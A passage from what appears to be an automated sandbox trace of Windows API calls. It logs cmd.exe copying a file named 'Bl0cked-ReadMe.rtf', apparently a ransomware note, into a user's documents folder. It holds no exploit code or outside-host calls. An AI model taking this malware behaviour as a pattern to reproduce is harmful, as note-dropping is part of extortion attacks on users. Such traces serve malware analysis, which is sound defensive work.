0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12542 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12543 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 12544 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = 
"private_0x00000000002a0000" filename = "" Region: id = 12545 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12546 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12547 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12548 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12549 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12550 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12551 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12552 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12553 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 12554 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 12555 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12556 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12557 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12558 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 12559 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12560 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12561 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 12562 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12563 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 173 os_tid = 0xbdc [0132.605] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe0c | out: lpSystemTimeAsFileTime=0x26fe0c*(dwLowDateTime=0x88f85dc0, dwHighDateTime=0x1d440a9)) [0132.605] GetCurrentProcessId () returned 0xb58 [0132.605] GetCurrentThreadId () 
returned 0xbdc [0132.605] GetTickCount () returned 0x2a2e3 [0132.605] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe04 | out: lpPerformanceCount=0x26fe04*=18939433031) returned 1 [0132.606] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.606] __set_app_type (_Type=0x1) [0132.606] __p__fmode () returned 0x76b331f4 [0132.606] __p__commode () returned 0x76b331fc [0132.606] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.606] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.606] GetCurrentThreadId () returned 0xbdc [0132.606] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x38 [0132.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.606] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.606] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.606] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd9c | out: phkResult=0x26fd9c*=0x0) returned 0x2 [0132.606] VirtualQuery (in: lpAddress=0x26fdd3, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.606] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.606] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd6c, dwLength=0x1c | out: 
lpBuffer=0x26fd6c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.607] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.607] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0132.607] GetConsoleOutputCP () returned 0x1b5 [0132.607] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.607] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.607] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.607] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.607] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.607] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.608] GetEnvironmentStringsW () returned 0x2b0180* [0132.608] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0132.608] GetEnvironmentStringsW () returned 0x2b0180* [0132.608] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0132.608] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed0c | out: 
phkResult=0x26ed0c*=0x40) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0xa8, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x0, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegCloseKey (hKey=0x40) returned 0x0 [0132.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed0c | out: phkResult=0x26ed0c*=0x40) returned 0x0 [0132.608] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x0, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x9, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.609] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x9, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.609] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x9, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.609] RegCloseKey (hKey=0x40) returned 0x0 [0132.609] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0132.609] srand (_Seed=0x5b886367) [0132.609] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" 
[0132.609] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0132.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.609] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.609] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.609] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.609] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.609] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.609] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.609] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.609] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.609] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.610] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.610] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.610] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.610] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.610] GetEnvironmentStringsW () returned 0x2b22d0* [0132.610] FreeEnvironmentStringsW (penv=0x2b22d0) returned 1 [0132.610] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") 
returned 0x1b [0132.610] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.610] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.610] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.610] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.610] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.610] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.610] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.610] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.610] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fad8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.610] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fad8, lpFilePart=0x26fad4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fad4*="Desktop") returned 0x18 [0132.610] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.610] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f854 | out: lpFindFileData=0x26f854) returned 0x2b0010 [0132.610] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0132.610] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f854 | out: lpFindFileData=0x26f854) returned 0x2b0010 [0132.611] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0132.611] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f854 | out: lpFindFileData=0x26f854) returned 0x2b0010 [0132.611] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0132.611] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 
[0132.611] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.611] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.611] GetEnvironmentStringsW () returned 0x2b2af0* [0132.611] FreeEnvironmentStringsW (penv=0x2b2af0) returned 1 [0132.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.612] GetConsoleOutputCP () returned 0x1b5 [0132.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.612] GetUserDefaultLCID () returned 0x409 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc18, cchData=128 | out: lpLCData="0") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc18, cchData=128 | out: lpLCData="0") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc18, cchData=128 | out: lpLCData="1") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 
| out: lpLCData="Sat") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.612] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.613] GetConsoleTitleW (in: lpConsoleTitle=0x2a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.613] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.613] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.613] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.613] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.614] _wcsicmp (_String1="type", _String2=")") returned 75 [0132.614] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0132.614] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0132.614] _wcsicmp (_String1="IF", _String2="type") returned -11 [0132.614] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0132.614] _wcsicmp (_String1="REM", _String2="type") returned -2 [0132.614] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0132.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.618] GetFileType (hFile=0x7) returned 0x2 [0132.618] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fb10 | out: lpMode=0x26fb10) returned 1 [0132.618] _dup (_FileHandle=1) returned 3 [0132.618] _close (_FileHandle=1) returned 0 [0132.618] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0132.618] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26fae0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0132.619] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0132.619] GetConsoleTitleW (in: lpConsoleTitle=0x26f910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.620] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0132.620] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0132.620] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0132.620] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0132.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.620] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26f474, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f474) returned 0x2a0e70 [0132.621] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0132.621] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0132.621] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0132.621] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e380, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0132.621] _open_osfhandle (_OSFileHandle=0x54, 
_Flags=8) returned 4 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] GetFileType (hFile=0x54) returned 0x1 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e3d8 | out: lpFileSizeHigh=0x26e3d8*=0x0) returned 0x1632 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.621] GetFileType (hFile=0x4c) returned 0x1 [0132.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.621] GetFileType (hFile=0x4c) returned 0x1 [0132.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.621] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.622] GetFileType (hFile=0x4c) returned 0x1 [0132.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.622] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.622] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, 
lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle 